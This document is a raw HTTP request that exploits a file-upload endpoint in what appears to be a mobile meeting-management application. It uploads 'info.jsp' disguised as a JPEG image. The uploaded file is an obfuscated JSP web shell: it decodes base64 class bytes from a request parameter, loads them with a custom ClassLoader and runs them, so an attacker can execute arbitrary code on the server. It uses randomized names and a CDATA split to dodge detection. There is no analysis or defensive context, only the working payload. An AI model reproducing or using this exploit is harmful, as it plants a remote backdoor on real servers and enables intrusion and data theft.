POST /manage/mobiMeetingApp/uploadMeetingFile.do HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 1597
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Token: xxxxxxxxxxxxxxxxx
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="file"; filename="info.jsp"
Content-Type: image/jpeg
<?xml version="1.0" encoding="UTF-8"?>
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
<jsp:declaration>
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class GnDlLQpR(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] KWPXeYqY(String str) throws Exception {
try {
Class HnktBjpK = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) HnktBjpK.getMethod("decodeBuffer", String.class).invoke(HnktBjpK.newInstance(), str);
} catch (Exception e) {
Class HnktBjpK = Class.forName("java.util.Base64");
Object cUASwQYK = HnktBjpK.getMethod("getDecoder").invoke(null);
return (byte[]) cUASwQYK.getClass().getMethod("decode", String.class).invoke(cUASwQYK, str);
}
}
Thread cT = Thread.currentThread();
ClassLoader BfDrVfLM = cT.getContextClassLoader();
</jsp:declaration>
<jsp:scriptlet>
String boWqnWUy = requ<![CDATA[est]]>.getParameter("asdowi243");
if (boWqnWUy != null) {
Class IFwYZevI = new U(BfDrVfLM).GnDlLQpR(KWPXeYqY(boWqnWUy));
IFwYZevI.newInstance().equals(pageContext);
}
</jsp:scriptlet>
</jsp:root>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--